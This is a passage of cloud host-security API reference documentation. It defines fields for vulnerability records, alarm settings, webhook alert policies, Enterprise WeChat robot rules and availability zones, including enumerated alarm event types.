VulLevel | Integer | Hazard level: 1-Low-risk; 2-Medium-risk; 3-High-risk; 4-Critical Note: This field may return null, indicating that no valid values can be obtained. |
VulCount | Integer | Number of vulnerabilities Note: This field may return null, indicating that no valid values can be obtained. |
VulId | Integer | Vulnerability ID Note: This field may return null, indicating that no valid values can be obtained. |
List of alarm settings
Used by actions: DescribeWarningList.
Name | Type | Description |
---|---|---|
Type | Integer | Event alarm type. 1: offline; 2: Trojan; 3: abnormal log-in; 4: brute force cracking; 5: vulnerability (including types of values 9, 10, 11, and 12); 6: high-risk command; 7: reverse shell; 8: local privilege escalation; 9: application vulnerability; 10: web CMS vulnerability; 11: emergency vulnerability; 12: security baseline; 13: tampering prevention; 14: malicious request; 15: network attack; 16: Windows system vulnerability; 17: Linux software vulnerability; 18: core file monitoring; 19: client uninstallation; 20: client offline. |
DisablePhoneWarning | Integer | 1: disable alarm; 0: enable alarm |
BeginTime | String | Start time. Format: HH:mm. |
EndTime | String | End time. Format: HH:mm. |
TimeZone | String | Time zone information |
ControlBit | Integer | Vulnerability level control bit (corresponding to the decimal storage in the database) |
ControlBits | String | Vulnerability level control bits in binary. Each bit indicates the enabling status of the corresponding vulnerability level on the page: low, medium, and high (0: disabled; 1: enabled). For example, 101 indicates that both low and high levels are enabled. |
HostRange | Integer | Alarm Host Range Type. 0: All Hosts; 1: By Project; 2: By Tencent Cloud Tag; 3: By Host Security Tag; 4: Custom Hosts Note: This field may return null, indicating that no valid values can be obtained. |
Count | Integer | Configured Number of Hosts in the Range of Alarm, used by the frontend to decide when to display prompt information. Note: This field may return null, indicating that no valid values can be obtained. |
Parameters used to update alarms or inserted into alarms
Used by actions: ModifyWarningSetting.
Name | Type | Required | Description |
---|---|---|---|
Type | Integer | No | Event Alarm Type. 1: Offline; 2: Trojan; 3: Exceptional login; 4: Brute force; 5: Vulnerability (split into four types ranging from 9 to 12); 6: High-risk command; 7: Reverse sell; 8: Local privilege escalation;, 9: System component vulnerabilities; 10: Web application vulnerabilities; 11: Emergency vulnerabilities; 12: Security baseline; 14: Malicious request; 15: Network attack; 16: Windows system vulnerabilities; 17: Linux software vulnerabilities |
DisablePhoneWarning | Integer | No | 1: disable alarm; 0: enable alarm. |
BeginTime | String | No | Start time. Format: HH:mm. |
EndTime | String | No | End time. Format: HH:mm. |
ControlBits | String | No | 1. Vulnerability level control bits in binary. Each bit corresponds to the vulnerability level enabling status on the corresponding page. Level: low, medium, high (0: disabled; 1: enabled). Example: 101, indicating both the low and high levels are enabled. 2. Brute force cracking control bits in binary. 01: notify upon successful brute force cracking; 10: notify upon brute force cracking failure. |
HostRange | Integer | No | Alarm Host Range Type. 0: All Hosts; 1: By Project; 2: By Tencent Cloud Tag; 3: By Host Security Tag; 4: Custom Hosts |
Custom passthrough field structure
Used by actions: DescribeWebHookPolicy, ModifyWebHookPolicy.
Name | Type | Required | Description |
---|---|---|---|
Key | String | Yes | key Note: This field may return null, indicating that no valid values can be obtained. |
Value | String | Yes | value Note: This field may return null, indicating that no valid values can be obtained. |
Enterprise WeChat Robot Event Types
Used by actions: DescribeWebHookPolicy, DescribeWebHookRule, DescribeWebHookRules, ModifyWebHookPolicy, ModifyWebHookRule.
Name | Type | Required | Description |
---|---|---|---|
Type | Integer | Yes | Event type |
ControlBit | String | Yes | Event content |
Enterprise WeChat Robot Host Range
Used by actions: DescribeWebHookPolicy, DescribeWebHookRule, DescribeWebHookRules, ModifyWebHookPolicy, ModifyWebHookRule.
Name | Type | Required | Description |
---|---|---|---|
Type | Integer | Yes | Host Range [1: Project |2: Tencent Cloud Tag | 3: Host Security Tag | 4: Optional] Empty array means all. |
Values | Array of String | Yes | Host Project or Tag Content |
Policy
Used by actions: DescribeWebHookPolicy.
Name | Type | Description |
---|---|---|
Id | Integer | id Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | Policy name Note: This field may return null, indicating that no valid values can be obtained. |
Events | Array of WebHookEventKv | Event type Note: This field may return null, indicating that no valid values can be obtained. |
HostLabels | Array of WebHookHostLabel | Host range Note: This field may return null, indicating that no valid values can be obtained. |
Receivers | Array of WebHookReceiver | Recipient Note: This field may return null, indicating that no valid values can be obtained. |
Format | Integer | Format. 0: text; 1: JSON. Note: This field may return null, indicating that no valid values can be obtained. |
CustomFields | Array of WebHookCustomField | Custom passthrough field Note: This field may return null, indicating that no valid values can be obtained. |
IsDisabled | Integer | Enable/Disable [1-Disable, 0-Enable] Note: This field may return null, indicating that no valid values can be obtained. |
Quuids | Array of String | Host list Note: This field may return null, indicating that no valid values can be obtained. |
HostCount | Integer | Number of hosts Note: This field may return null, indicating that no valid values can be obtained. |
Alarm recipient
Used by actions: DescribeWebHookPolicy, DescribeWebHookReceiver, DescribeWebHookReceiverUsage, ModifyWebHookPolicy.
Name | Type | Required | Description |
---|---|---|---|
Id | Integer | No | id Note: This field may return null, indicating that no valid values can be obtained. |
Name | String | No | Recipient name Note: This field may return null, indicating that no valid values can be obtained. |
Addr | String | No | Webhook URL Note: This field may return null, indicating that no valid values can be obtained. |
Usage information on associated policies of the alarm recipient
Used by actions: DescribeWebHookReceiverUsage.
Name | Type | Description |
---|---|---|
ReceiverId | Integer | Recipient ID Note: This field may return null, indicating that no valid values can be obtained. |
ReceiverName | String | Recipient name Note: This field may return null, indicating that no valid values can be obtained. |
PolicyName | String | Policy name Note: This field may return null, indicating that no valid values can be obtained. |
Enterprise WeChat Robot Rule Details
Used by actions: DescribeWebHookRule, ModifyWebHookRule.
Name | Type | Required | Description |
---|---|---|---|
RuleName | String | Yes | Rule name |
HookAddr | String | Yes | Chatbot address |
RuleItems | Array of WebHookEventKv | Yes | Event type |
RuleId | Integer | No | Rule ID |
RuleRemark | String | No | Remarks |
HostLabels | Array of WebHookHostLabel | No | Host scope |
HostIds | Array of String | No | Host ID List |
IsDisabled | Integer | No | Whether it is disabled [1: disabled|0: enabled] |
Enterprise WeChat Robot Rule Summary
Used by actions: DescribeWebHookRules.
Name | Type | Description |
---|---|---|
RuleId | Integer | Rule ID |
RuleName | String | Rule name |
HookAddr | String | Robot Address |
RuleRemark | String | Remarks |
RuleItems | Array of WebHookEventKv | Event type |
HostLabels | Array of WebHookHostLabel | Host range |
IsDisabled | Integer | Enable/Disable [1-Disable, 0-Enable] |
CreateTime | String | Creation time |
UpdateTime | String | Update time |
HostCount | Integer | Number of hosts |
Availability zone information
Used by actions: DescribeBanRegions.
Name | Type | Description |
---|---|---|
ZoneName | String | Availability zone name |
本页内容是否解决了您的问题?